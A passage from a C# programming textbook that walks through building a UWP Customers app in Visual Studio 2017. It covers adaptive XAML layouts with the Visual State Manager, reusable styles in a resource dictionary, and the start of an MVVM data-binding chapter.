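                <Setter Target="customersColumnarView.Visibility" Value="Visible"/>
            </VisualState.Setters>
        </VisualState>
    </VisualStateGroup>
</VisualStateManager.VisualStateGroups>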
Define a layout for the narrow view
1. In the XAML pane for the Customers app, add the x:Name and Visibility
properties shown below in bold to the nested Grid control:
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
    <Grid x:Name="customersTabularView" Margin="10,20,10,20"
          Visibility="Collapsed">
        ...
    </Grid>
</Grid>
This Grid control will hold the default view of the form. You will
reference this Grid control in other XAML markup later in this set of
exercises, hence the requirement to give it a name. The Visibility
property specifies whether the control is displayed (Visible) or hidden
(Collapsed). The default value is Visible, but for the time being, you will
hide this Grid while you define another for displaying the data in a
columnar format.
2. After the closing </Grid> tag for the customersTabularView Grid
control, add another Grid control. Set the x:Name property to
customersColumnarView, set the Margin property to 10,20,10,20, and
set the Visibility property to Visible.
Tip You can expand and contract elements in the XAML pane of
the Design View window and make the structure easier to read by
clicking the + and – signs that appear down the left edge of the
XAML markup.
<Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
    <Grid x:Name="customersTabularView" Margin="10,20,10,20"
          Visibility="Collapsed">
        ...
    </Grid>
    <Grid x:Name="customersColumnarView" Margin="10,20,10,20"
          Visibility="Visible">

    </Grid>
</Grid>
This Grid control will hold the "narrow" view of the form. The fields in
this grid will be laid out in a columnar manner, as described earlier.
3. In the customersColumnarView Grid control, add the following row
definitions:
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
      Visibility="Visible">
    <Grid.RowDefinitions>
        <RowDefinition Height="*"/>
        <RowDefinition Height="10*"/>
    </Grid.RowDefinitions>
</Grid>
You will use the top row to display the title and the second, much larger
row to display the controls in which users enter data. The asterisk (*)
denotes proportional sizing: the row with Height="10*" is allocated ten
times the height of the row with Height="*".
4. Immediately after the row definitions, add the TextBlock control shown
below in bold. This control displays a truncated title, Customers, in the
first row of the Grid control. Set FontSize to 30.
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Customers" VerticalAlignment="Center" FontSize="30"/>
</Grid>
5. Add another Grid control to row 1 of the customersColumnarView Grid
control, directly after the TextBlock control that contains the Customers
title. This Grid control will display the labels and data-entry controls in
two columns, so add the row and columns definitions shown in bold in
the following code example to this Grid.
<TextBlock Grid.Row="0" ... />
<Grid Grid.Row="1">
<Grid.ColumnDefinitions>
<ColumnDefinition/>
<ColumnDefinition/>
</Grid.ColumnDefinitions>
<Grid.RowDefinitions>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
<RowDefinition/>
</Grid.RowDefinitions>
</Grid>
Notice that if all the rows or columns in a set have the same height or
width, you do not need to specify their size; they simply share the
available space equally.
6. Copy the XAML markup for the ID, Title, First Name, and Last Name
TextBlock controls from the customersTabularView Grid control to the
new Grid control, immediately after the row definitions that you just
added. Put the ID control in row 0, the Title control in row 1, the First
Name control in row 2, and the Last Name control in row 3. Place all
controls in column 0.
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="ID" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="1" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Title" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="2" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="First Name" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="3" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Last Name" VerticalAlignment="Center"
FontSize="20"/>
7. Copy the XAML markup for the id, title, firstName, and lastName
TextBox and ComboBox controls from the customersTabularView Grid
control to the new Grid control, immediately after the TextBlock controls.
Put the id control in row 0, the title control in row 1, the firstName
control in row 2, and the lastName control in row 3. Place all four
controls in column 1. Also, change the names of the controls by
prefixing them with the letter c (for column). This final change is
necessary to avoid clashing with the names of the existing controls in
the customersTabularView Grid control.
<TextBlock Grid.Row="3" Grid.Column="0"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Last Name" .../>
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20" IsReadOnly="True"/>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle"
HorizontalAlignment="Stretch"
VerticalAlignment="Center" FontSize="20">
<ComboBoxItem Content="Mr"/>
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
8. Copy the TextBlock and TextBox controls for the email address and
telephone number from the customersTabularView Grid control to the
new Grid control, placing them after the cTitle ComboBox control. Place
the TextBlock controls in column 0, in rows 4 and 5, and the TextBox
controls in column 1, in rows 4 and 5. Change the name of the email
TextBox control to cEmail and the name of the phone TextBox control to
cPhone. Remove the Width properties of the cEmail and cPhone
controls, and set their HorizontalAlignment properties to Stretch.
<ComboBox ...>
...
</ComboBox>
<TextBlock Grid.Row="4" Grid.Column="0"
HorizontalAlignment="Center" TextWrapping="Wrap"
Text="Email" VerticalAlignment="Center" FontSize="20"/>
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="5" Grid.Column="0"
HorizontalAlignment="Center" TextWrapping="Wrap"
Text="Phone" VerticalAlignment="Center" FontSize="20"/>
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
The Design View window should display the columnar layout like this:
9. Return to the XAML markup for the customersTabularView Grid
control and set the Visibility property to Visible.
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Visible">
10. In the XAML markup for the customersColumnarView Grid control, set
the Visibility property to Collapsed.
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
The Design View window should display the original tabular layout of
the Customers form. This is the default view that will be used by the
app.
You have now defined the layout that will appear in the narrow view. You
might be concerned that in essence all you have done is duplicated many of
the controls and laid them out in a different manner. If you run the form and
switch between views, how will data in one view transfer to the other? For
example, if you enter the details for a customer when the app is running full
screen, and then you switch to the narrow view, the newly displayed controls
will not contain the same data that you just entered. UWP apps address this
problem by using data binding. This is a technique by which you can
associate the same piece of data with multiple controls, and as the data changes,
all controls display the updated information. You will see how this works in
Chapter 26. For the time being, you need to consider only how to use the
Visual State Manager to switch between layouts when the view changes.
You can use triggers that alert the Visual State Manager when some
aspect (such as the height or width) of the display changes. You can define
the visual state transitions performed by these triggers in the XAML markup
of your app. This is what you will do in the next exercise.
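Although this chapter applies visual states declaratively through triggers, it may be worth knowing that a state can also be selected from code-behind. The following C# sketch is illustrative only: it assumes hypothetical visual states named NarrowLayout and WideLayout defined in the page's XAML markup, with the handler wired to the page's SizeChanged event.

// Hypothetical: NarrowLayout and WideLayout are visual states assumed
// to be defined in this page's XAML markup.
private void Page_SizeChanged(object sender, SizeChangedEventArgs e)
{
    string stateName = e.NewSize.Width < 660 ? "NarrowLayout" : "WideLayout";
    VisualStateManager.GoToState(this, stateName, false);
}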
Use the Visual State Manager to modify the layout
1. In the XAML pane for the Customers app, after the closing </Grid> tag
for the customersColumnarView Grid control, add the following
markup:
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
...
</Grid>
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
You define the visual state transitions by implementing one or more
visual state groups. Each visual state group specifies the transitions that
should occur when the Visual State Manager switches to this state. Each
state should be given a meaningful name to help you identify its
purpose.
2. Add the following visual state trigger shown in bold to the visual state
group:
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="660"/>
</VisualState.StateTriggers>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
This trigger will fire whenever the width of the window is 660 pixels or
more. Below this width, the controls and labels on the Customers form
start to wrap and become difficult to use.
3. After the trigger definition, add the following code shown in bold to the
XAML markup:
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="660"/>
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="customersTabularView.Visibility"
Value="Visible"/>
<Setter
Target="customersColumnarView.Visibility" Value="Collapsed"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
This code specifies the actions that occur when the trigger is fired. In
this example, the actions are defined by using Setter elements. A Setter
element specifies a property to set and the value to which the property
should be set. For this view, the Setter commands change the values of
specified properties; the customersTabularView Grid control is made
visible and the customersColumnarView Grid control is collapsed (made
invisible).
4. After the TabularLayout visual state definition, add the following
markup which defines the equivalent functionality to switch to the
columnar view:
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState x:Name="TabularLayout">
...
</VisualState>
<VisualState x:Name="ColumnarLayout">
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="0"/>
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="customersTabularView.Visibility"
Value="Collapsed"/>
<Setter
Target="customersColumnarView.Visibility" Value="Visible"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
When the window width drops below 660 pixels, the app switches to the
ColumnarLayout state; the customersTabularView Grid control is
collapsed and the customersColumnarView Grid control is made visible.
5. In the toolbar, ensure that the Debug Target is set to Local Machine, and
then on the Debug menu, click Start Debugging.
The app starts and displays the Customer form full screen. The data is
displayed using the tabular layout.
Note If you are using a display with a resolution of less than 1366
× 768, start the app running in the Simulator as described earlier.
Configure the Simulator with a resolution of 1366 × 768.
6. Resize the Customer app window to display the form in a narrow view.
When the window width drops below 660 pixels, the display switches to
the columnar layout.
7. Resize the Customer app window to make it wider than 660 pixels (or
maximize it to full screen).
The Customer form reverts to the tabular layout.
8. Return to Visual Studio and stop debugging.
Applying styles to a UI
Now that you have the mechanics of the basic layout of the app resolved, the
next step is to apply some styling to make the UI look more attractive. The
controls in a UWP app have a varied range of properties that you can use to
change features such as the font, color, size, and other attributes of an
element. You can set these properties individually for each control, but this
approach can become cumbersome and repetitive if you need to apply the
same styling to a number of controls. Also, the best apps apply a consistent
styling across the UI, and it is difficult to maintain consistency if you have to
repeatedly set the same properties and values as you add or change controls.
The more times you have to do the same thing, the greater the chances are
that you will get it wrong at least once!
With UWP apps, you can define reusable styles. You can implement them
as app-wide resources by creating a resource dictionary, and then they are
available to all controls in all pages in an app. You can also define local
resources that apply to only a single page in the XAML markup for that page.
In the following exercise, you will define some simple styles for the
Customers app and apply these styles to the controls on the Customers form.
Define styles for the Customers form
1. In Solution Explorer, right-click the Customers project, point to Add,
and then click New Item.
2. In the Add New Item - Customers dialog box, click Resource
Dictionary. In the Name box, type AppStyles.xaml, and then click Add.
The AppStyles.xaml file appears in the Code and Text Editor window. A
resource dictionary is an XAML file that contains resources that the app
can use. The AppStyles.xaml file looks like this:
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers">
</ResourceDictionary>
Styles are one example of a resource, but you can also add other items.
In fact, the first resource that you will add is not actually a style but an
ImageBrush that will be used to paint the background of the outermost
Grid control on the Customers form.
3. In Solution Explorer, right-click the Customers project, point to Add,
and then click New Folder. Change the name of the new folder to
Images.
4. Right-click the Images folder, point to Add, and then click Existing
Item.
5. In the Add Existing Item - Customers dialog box, browse to the
\Microsoft Press\VCSBS\Chapter 25\Resources folder in your
Documents folder, click wood.jpg, and then click Add.
The wood.jpg file is added to the Images folder in the Customers
project. This file contains an image of a tasteful wooden background
that you will use for the Customers form.
6. In the Code and Text Editor window displaying the AppStyles.xaml file,
add the following XAML markup shown in bold:
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers">
<ImageBrush x:Key="WoodBrush"
ImageSource="Images/wood.jpg"/>
</ResourceDictionary>
This markup creates an ImageBrush resource called WoodBrush that is
based on the wood.jpg file. You can use this image brush to set the
background of a control, and it will display the image in the wood.jpg
file.
7. Underneath the ImageBrush resource, add the following style shown in
bold to the AppStyles.xaml file:
<ResourceDictionary
...>
<ImageBrush x:Key="WoodBrush"
ImageSource="Images/wood.jpg"/>
<Style x:Key="GridStyle" TargetType="Grid">
<Setter Property="Background" Value="{StaticResource
WoodBrush}"/>
</Style>
</ResourceDictionary>
This markup shows how to define a style. A Style element should have a
name (a key that enables it to be referenced elsewhere in the app), and it
should specify the type of control to which the style can be applied. You
are going to use this style with the Grid control.
The body of a style consists of one or more Setter elements. In this
example, the Background property is set to the WoodBrush ImageBrush
resource. The syntax is a little curious, though. In a value, you can either
reference one of the appropriate system-defined values for the property
(such as “Red” if you want to set the background to a solid red color) or
specify a resource that you have defined elsewhere. To reference a
resource defined elsewhere, you use the StaticResource keyword and
then place the entire expression in curly braces.
8. Before you can use this style, you must update the global resource
dictionary for the app in the App.xaml file by adding a reference to the
AppStyles.xaml file. In Solution Explorer, double-click App.xaml to
display it in the Code and Text Editor window. The App.xaml file looks
like this:
<Application
x:Class="Customers.App"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers"
RequestedTheme="Light">
</Application>
Currently, the App.xaml file defines only the app object and brings a
few namespaces into scope; the global resource dictionary is empty.
9. Add to the App.xaml file the code shown here in bold:
<Application
x:Class="Customers.App"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers"
RequestedTheme="Light">
<Application.Resources>
<ResourceDictionary>
<ResourceDictionary.MergedDictionaries>
<ResourceDictionary Source="AppStyles.xaml"/>
</ResourceDictionary.MergedDictionaries>
</ResourceDictionary>
</Application.Resources>
</Application>
This markup adds the resources defined in the AppStyles.xaml file to the
list of resources available in the global resource dictionary. These
resources are now available for use throughout the app.
10. Switch to the MainPage.xaml file displaying the UI for the Customers
form. In the XAML pane, find the outermost Grid control:
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
In the XAML markup for this control, replace the Background property
with a Style property that references the GridStyle style, as shown in
bold in the following code:
<Grid Style="{StaticResource GridStyle}">
11. On the Build menu, click Rebuild Solution.
The background of the Grid control in the Design View window should
switch and display a wooden panel, like this:
Note Ideally, you should ensure that any background image that
you apply to a page or control maintains its aesthetics as the device
form factor and orientation change. An image that looks cool on a
30-inch monitor might appear distorted and squashed on a
Windows phone. It might be necessary to provide alternative
backgrounds for different views and orientations and use the
Visual State Manager to modify the Background property of a
control to switch between them as the visual state changes.
12. Return to AppStyles.xaml in the Code and Text Editor window and add
the following FontStyle style after the GridStyle style:
<Style x:Key="GridStyle" TargetType="Grid">
...
</Style>
<Style x:Key="FontStyle" TargetType="TextBlock">
<Setter Property="FontFamily" Value="Segoe Print"/>
</Style>
This style applies to TextBlock elements and changes the font to Segoe
Print. This font resembles a handwriting style.
At this stage, it would be possible to reference the FontStyle style in
every TextBlock control that required this font, but this approach would
not provide any advantage over simply setting the FontFamily directly
in the markup for each control. The real power of styles occurs when
you combine multiple properties, as you will see in the next few steps.
13. Add the HeaderStyle style shown here to the AppStyles.xaml file:
<Style x:Key="FontStyle" TargetType="TextBlock">
...
</Style>
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="SteelBlue"/>
</Style>
This is a composite style that sets the HorizontalAlignment,
TextWrapping, VerticalAlignment, and Foreground properties of a
TextBlock. Additionally, the HeaderStyle style references the FontStyle
style by using the BasedOn property. The BasedOn property provides a
simple form of inheritance for styles.
You will use this style to format the labels that appear at the top of the
customersTabularView and customersColumnarView controls.
However, these headings have different font sizes (the heading for the
tabular layout is bigger than that of the columnar layout), so you will
create two more styles that extend the HeaderStyle style.
14. Add the following styles to the AppStyles.xaml file:
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
...
</Style>
<Style x:Key="TabularHeaderStyle" TargetType="TextBlock"
BasedOn="{StaticResource HeaderStyle}">
<Setter Property="FontSize" Value="40"/>
</Style>
<Style x:Key="ColumnarHeaderStyle" TargetType="TextBlock"
BasedOn="{StaticResource HeaderStyle}">
<Setter Property="FontSize" Value="30"/>
</Style>
Note that the font sizes for these styles are slightly smaller than the font
sizes currently used by the headings in the Grid controls. This is because
the Segoe Print font is bigger than the default font.
15. Switch back to the MainPage.xaml file and find the XAML markup for
the TextBlock control for the Adventure Works Customers label in the
customersTabularView Grid control:
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Adventure Works Customers" VerticalAlignment="Center"
FontSize="50"/>
16. Change the properties of this control to reference the
TabularHeaderStyle style, as shown in bold in the following code:
<TextBlock Grid.Row="0" Style="{StaticResource
TabularHeaderStyle}"
Text="Adventure Works Customers"/>
The heading displayed in the Design View window should change color,
size, and font and look like this:
17. Find the XAML markup for the TextBlock control for the Customers
label in the customersColumnarView Grid control:
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Customers" VerticalAlignment="Center" FontSize="30"/>
Modify the markup of this control to reference the
ColumnarHeaderStyle style, as shown here in bold:
Click here to view code image
<TextBlock Grid.Row="0" Style="{StaticResource
ColumnarHeaderStyle}"
Text="Customers"/>
Be aware that you won’t see this change in the Design View window
because the customersColumnarView Grid control is collapsed by
default. However, you will see the effects of this change when you run
the app later in this exercise.
18. Return to the AppStyles.xaml file in the Code and Text Editor window.
Modify the HeaderStyle style with the additional property Setter
elements shown in bold in the following example:
<Style x:Key="HeaderStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="SteelBlue"/>
<Setter Property="RenderTransformOrigin" Value="0.5,0.5"/>
<Setter Property="RenderTransform">
<Setter.Value>
<CompositeTransform Rotation="-5"/>
</Setter.Value>
</Setter>
</Style>
These elements rotate the text displayed in the header about its midpoint
by an angle of -5 degrees (5 degrees counterclockwise) by using a transformation.
Note This example shows a simple transformation. Using the
RenderTransform property, you can perform a variety of other
transformations to an item, and you can combine multiple
transformations. For example, you can translate (move) an item on
the x- and y-axes, skew the item (make it lean), and scale an
element.
You should also notice that the value of the RenderTransform
property is itself another property/value pair (the property is
Rotation, and the value is –5). In cases such as this, you specify the
value by using the <Setter.Value> tag.
19. Switch to the MainPage.xaml file. In the Design View window, the title
should now be displayed at a jaunty angle (you might need to rebuild the
application first before the updated style is applied):
20. In the AppStyles.xaml file, add the following style:
<Style x:Key="LabelStyle" TargetType="TextBlock" BasedOn="
{StaticResource FontStyle}">
<Setter Property="FontSize" Value="20"/>
<Setter Property="HorizontalAlignment" Value="Center"/>
<Setter Property="TextWrapping" Value="Wrap"/>
<Setter Property="VerticalAlignment" Value="Center"/>
<Setter Property="Foreground" Value="AntiqueWhite"/>
</Style>
You will apply this style to the TextBlock elements that provide the
labels for the various TextBox and ComboBox controls that the user
employs to enter customer information. The style references the same
font style as the headings but sets the other properties to values more
appropriate for the labels.
21. Go back to the MainPage.xaml file. In the XAML pane, modify the
markup for the TextBlock controls for each of the labels in the
customersTabularView and customersColumnarView Grid controls.
Remove the HorizontalAlignment, TextWrapping, VerticalAlignment,
and FontSize properties, and reference the LabelStyle style, as shown
here in bold:
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Visible">
...
<Grid Grid.Row="2">
...
<TextBlock Grid.Row="0" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="ID"/>
<TextBlock Grid.Row="0" Grid.Column="3" Style="
{StaticResource LabelStyle}"
Text="Title"/>
<TextBlock Grid.Row="0" Grid.Column="5" Style="
{StaticResource LabelStyle}"
Text="First Name"/>
<TextBlock Grid.Row="0" Grid.Column="7" Style="
{StaticResource LabelStyle}"
Text="Last Name"/>
...
<TextBlock Grid.Row="3" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="Email"/>
...
<TextBlock Grid.Row="5" Grid.Column="1" Style="
{StaticResource LabelStyle}"
Text="Phone"/>
...
</Grid>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
...
<Grid Grid.Row="1">
...
<TextBlock Grid.Row="0" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="ID"/>
<TextBlock Grid.Row="1" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Title"/>
<TextBlock Grid.Row="2" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="First Name"/>
<TextBlock Grid.Row="3" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Last Name"/>
...
<TextBlock Grid.Row="4" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Email"/>
...
<TextBlock Grid.Row="5" Grid.Column="0" Style="
{StaticResource LabelStyle}"
Text="Phone"/>
...
</Grid>
</Grid>
The labels on the form should change to the Segoe Print font and be
displayed in antique white, in a font size of 20 points:
22. On the Debug menu, click Start Debugging to build and run the app.
Note Use the Simulator if you are running on a display with a
resolution less than 1366 × 768.
The Customers form should appear and be styled in the same way that it
appears in the Design View window in Visual Studio. Notice that if you
enter any text into the various fields on the form, they use the default
font and styling for the TextBox controls.
Note Although the Segoe Print font is good for labels and titles, it
is not recommended as a font for data-entry fields because some of
the characters can be difficult to distinguish from one another. For
example, the lowercase letter l is very similar to the digit 1, and the
uppercase letter O is almost indistinguishable from the digit 0. For
this reason, it makes sense to stick with the default font for the
TextBox controls.
23. Resize the window to make it narrower and verify that the styling has
been applied to the controls in the customersColumnarView grid. The
form should look like this:
24. Return to Visual Studio and stop debugging.
You can see that by using styles, you can easily implement a number of
really cool effects. Also, careful use of styles makes your code much more
maintainable than it would be if you set properties on individual controls. For
example, if you want to switch the font used by the labels and headings in the
Customers app, you need to make only a single change to the FontStyle style.
In general, you should use styles wherever possible; besides assisting
maintainability, the use of styles helps to keep the XAML markup for your
forms clean and uncluttered, and the XAML for a form needs to specify only
the controls and layout rather than how the controls should appear on the
form. You can also use Microsoft Blend for Visual Studio 2017 to define
complex styles that you can integrate into an app. Professional graphics
artists can use Blend to develop custom styles and provide these styles in the
form of XAML markup to developers building apps. All the developer has to
do is add the appropriate Style tags to the user interface elements to reference
the corresponding styles.
Summary
In this chapter, you learned how to use the Grid control to implement a user
interface that can scale to different device form factors and orientations. You
also learned how to use the Visual State Manager to adapt the layout of
controls when the user changes the size of the window displaying the app.
Finally, you learned how to create custom styles and apply them to the
controls on a form. Now that you have defined the user interface, the next
challenge is to add functionality to the app, enabling the user to display and
update data, which is what you will do in the final chapters.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 26.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To create a new UWP app: Use one of the UWP templates in Visual Studio
2017, such as the Blank App template.

To implement a user interface that scales to different device form factors
and orientations: Use a Grid control. Divide the Grid control into rows
and columns, and place controls in these rows and columns rather than
specifying an absolute location relative to the edges of the Grid.

To implement a user interface that can adapt to different display widths:
Create different layouts for each view that display the controls in an
appropriate manner. Use the Visual State Manager to select the layout to
display when the visual state changes.

To create custom styles: Add a resource dictionary to the app. Define
styles in this dictionary by using the <Style> element, and specify the
properties that each style changes. For example:

<Style x:Key="GridStyle" TargetType="Grid">
    <Setter Property="Background" Value="{StaticResource WoodBrush}"/>
</Style>

To apply a custom style to a control: Set the Style property of the
control and reference the style by name. For example:

<Grid Style="{StaticResource GridStyle}">
CHAPTER 26
Displaying and searching for data in
a Universal Windows Platform app
After completing the chapter, you will be able to:
- Explain how to use the Model–View–ViewModel pattern to implement the logic for a Universal Windows Platform app.
- Use data binding to display and modify data in a view.
- Create a ViewModel with which a view can interact with a model.
- Integrate a Universal Windows Platform app with Cortana to provide voice-activated search capabilities.
Chapter 25, “Implementing the user interface for a Universal Windows
Platform app,” demonstrates how to design a user interface (UI) that can
adapt to the different device form factors, orientations, and views that a
customer running your app might use. The sample app developed in that
chapter is a simple one designed for displaying and editing details about
customers.
In this chapter, you will see how to display data in the UI and learn about
the features in Windows 10 with which you can search for data in an app. In
performing these tasks, you will also learn about the way in which you can
structure a UWP app. This chapter covers a lot of ground. In particular, you
will look at how to use data binding to connect the UI to the data that it
displays and how to create a ViewModel to separate the user interface logic
from the data model and business logic for an app. You will also see how to
integrate a UWP app with Cortana to enable a user to perform voice-activated
searches.
Implementing the Model–View–ViewModel pattern
A well-structured graphical app separates the design of the user interface
from the data that the application uses and the business logic that comprises
the functionality of the app. This separation helps to remove the
dependencies between the various components, enabling different
presentations of the data without needing to change the business logic or the
underlying data model. This approach also clears the way for different
elements to be designed and implemented by individuals who have the
appropriate specialist skills. For example, a graphic artist can focus attention
on designing an appealing and intuitive UI, a database specialist can
concentrate on implementing an optimized set of data structures for storing
and accessing the data, and a C# developer can direct her efforts toward
implementing the business logic for the app. This is a common goal that has
been the aim of many development approaches, not just for UWP apps, and
over the past few years many techniques have been devised to help structure
an app in this way.
Arguably, the most popular approach is to follow the Model–View–
ViewModel (MVVM) design pattern. In this design pattern, the model
provides the data used by the app, and the view represents the way in which
the data is displayed in the UI. The ViewModel contains the logic that
connects the two, taking the user input and converting it into commands that
perform business operations on the model, and also taking the data from the
model and formatting it in the manner expected by the view. The following
diagram shows a simplified relationship between the elements of the MVVM
pattern. Note that an app might provide multiple views of the same data. In a
UWP app, for example, you might implement different view states, which
can present information by using different screen layouts. One job of the
ViewModel is to ensure that the data from the same model can be displayed
and manipulated by many different views. In a UWP app, the view can utilize
data binding to connect to the data presented by the ViewModel.
Additionally, the view can request that the ViewModel update data in the
model or perform business tasks by invoking commands implemented by the
ViewModel.
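Before working through the detail, the following minimal C# sketch may help to make the division of responsibilities concrete. It is illustrative only; the names CustomerModel and CustomerViewModel are hypothetical and are not part of the app built in this chapter.

// Model: holds the data and knows nothing about how it is displayed.
public class CustomerModel
{
    public string FirstName { get; set; }
    public string LastName { get; set; }
}

// ViewModel: adapts the model for display. Later sections add change
// notifications and commands to classes shaped like this one.
public class CustomerViewModel
{
    private readonly CustomerModel model = new CustomerModel();

    // The view binds to this property rather than touching the model directly.
    public string FullName => $"{this.model.FirstName} {this.model.LastName}";
}

// View: the XAML page. Its code-behind simply connects to the ViewModel:
// this.DataContext = new CustomerViewModel();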
Displaying data by using data binding
Before you get started implementing a ViewModel for the Customers app, it
helps to understand a little more about data binding and how you can apply
this technique to display data in a UI. Using data binding, you can link a
property of a control to a property of an object; if the value of the specified
property of the object changes, the property in the control that is linked to the
object also changes. Also, data binding can be bidirectional: if the value of a
property in a control that uses data binding changes, the modification is
propagated to the object to which the control is linked. The following
exercise provides a quick introduction to how data binding is used to display
data. It is based on the Customers app from Chapter 25.
Use data binding to display Customer information
1. Start Visual Studio 2017 if it is not already running.
2. Open the Customers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 26\Data Binding folder in your Documents
folder. This is a version of the Customers app that was developed in
Chapter 25, but the layout of the UI has been modified slightly; the
controls are displayed on a blue background, which makes them stand
out more easily.
Note The blue background was created by using a Rectangle
control that spans the same rows and columns as the TextBlock and
TextBox controls that display the headings and data. The rectangle
is filled by using a LinearGradientBrush that gradually changes
the color of the rectangle from a medium blue at the top to a very
dark blue at the bottom. The XAML markup for the Rectangle
control that is displayed in the customersTabularView Grid control
looks like this (the XAML markup for the
customersColumnarView Grid control includes a similar Rectangle
control, spanning the rows and columns used by that layout):
<Rectangle Grid.Row="0" Grid.RowSpan="6" Grid.Column="1"
Grid.ColumnSpan="7" ...>
<Rectangle.Fill>
<LinearGradientBrush EndPoint="0.5,1"
StartPoint="0.5,0">
<GradientStop Color="#FF0E3895"/>
<GradientStop Color="#FF141415" Offset="0.929"/>
</LinearGradientBrush>
</Rectangle.Fill>
</Rectangle>
3. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class.
In the Add New Item - Customers dialog box, ensure that the Class
template is selected. In the Name box, type Customer.cs, and then click
Add.
You will use this class to implement the Customer data type and then
implement data binding to display the details of Customer objects in the
UI.
5. In the Code and Text Editor window displaying the Customer.cs file,
make the Customer class public and add the following private fields and
properties shown in bold:
public class Customer
{
    private int _customerID;
    public int CustomerID
    {
        get => this._customerID;
        set
        {
            this._customerID = value;
        }
    }

